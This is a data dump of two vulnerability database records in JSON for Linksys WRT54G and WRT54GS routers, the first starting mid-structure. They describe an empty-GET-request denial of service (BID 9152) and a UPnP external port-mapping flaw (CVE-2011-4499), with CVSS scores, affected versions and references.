"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200312-0518",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery of this vulnerability has been credited to carbon@techcentric.net.",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2003-3527",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-3527",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G Router is a router device. The Linksys WRT54G Router is not properly handling some of the GET requests, and the remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the router embedded in port 80 of the WEB system listening will cause the router to be restarted, causing a denial of service attack. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "9152",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2003-3527",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"id": "VAR-200312-0518",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
],
"trust": 1.1353147
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
]
},
"last_update_date": "2022-05-17T01:47:37.712000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=107049411717616\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/346399"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"db": "BID",
"id": "9152"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-12-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"date": "2003-12-03T00:00:00",
"db": "BID",
"id": "9152"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-3527"
},
{
"date": "2003-12-03T00:00:00",
"db": "BID",
"id": "9152"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Router Empty HTTP GET Request Remote Denial of Service Attack Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-3527"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "9152"
}
],
"trust": 0.3
}
}
FKIE_CVE-2011-4499
Vulnerability from fkie_nvd - Published: 2011-11-22 11:55 - Updated: 2025-04-11 00:51

| Vendor | Product | Version | |
|---|---|---|---|
| cisco | linksys_wrt54g_router_firmware | * | |
| cisco | linksys_wrt54g_router_firmware | 3.03.9 | |
| cisco | linksys_wrt54g_router_firmware | 4.20.7 | |
| linksys | wrt54g | * | |
| linksys | wrt54g | 2.2 | |
| cisco | linksys_wrt54gs_router_firmware | * | |
| cisco | linksys_wrt54gs_router_firmware | 2.09.1 | |
| linksys | wrt54gs | 1.0 | |
| linksys | wrt54gs | 2.0 | |
| linksys | wrt54gs | 3.0 | |
| cisco | linksys_wrt54gs_router_firmware | * | |
| linksys | wrt54gs | 4.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07169C87-D8A2-43A0-8F36-7307F8A53586",
"versionEndIncluding": "4.20.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:3.03.9:*:*:*:*:*:*:*",
"matchCriteriaId": "31F69390-77E1-4122-8869-0D09F482F21A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:4.20.7:*:*:*:*:*:*:*",
"matchCriteriaId": "CDCDBCE4-FC0D-4328-AC1D-97E45A222B31",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBBECE9D-7805-4521-A0B1-15F2755312B8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54g:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C838786E-835E-42C9-A02E-90E29911280E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0C5EEE41-55BF-40CE-A0EB-1D83CC1B1340",
"versionEndIncluding": "4.70.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:2.09.1:*:*:*:*:*:*:*",
"matchCriteriaId": "9D58336D-0F52-46B4-B14D-490D1722CA66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2D6094DD-5683-42F8-B19A-899D8728F3D1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0B90EA29-14A0-412C-B375-80F72FF0E50C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA3BD04C-B77D-4CF0-8EB8-9BDF2513C061",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4582AD75-3093-443A-8770-F540A83E4B6A",
"versionEndIncluding": "1.06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:linksys:wrt54gs:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1E9C1BA7-E192-4E61-B500-4F6C8FFA82A8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability."
},
{
"lang": "es",
"value": "La implementaci\u00f3n de IGD UPnP de la pila UPnP Broadcom de Cisco Linksys WRT54G con firmware anterior a 4.30.5, de WRT54GS v1 hasta la versi\u00f3n v3 con firmware anterior a 4.71.1 y de WRT54GS v4 con firmware anterior a 1.06.1 permite a atacantes remotos establecer \"mappings\" a puertos arbitrarios enviando una acci\u00f3n UPnP AddPortMapping en una petici\u00f3n SOAP a un interfaz WAN. Relacionado con una vulnerabilidad de \"direccionamiento externo\" (\"external forwarding\")."
}
],
"id": "CVE-2011-4499",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-11-22T11:55:04.683",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"source": "cve@mitre.org",
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.upnp-hacks.org/devices.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-16"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}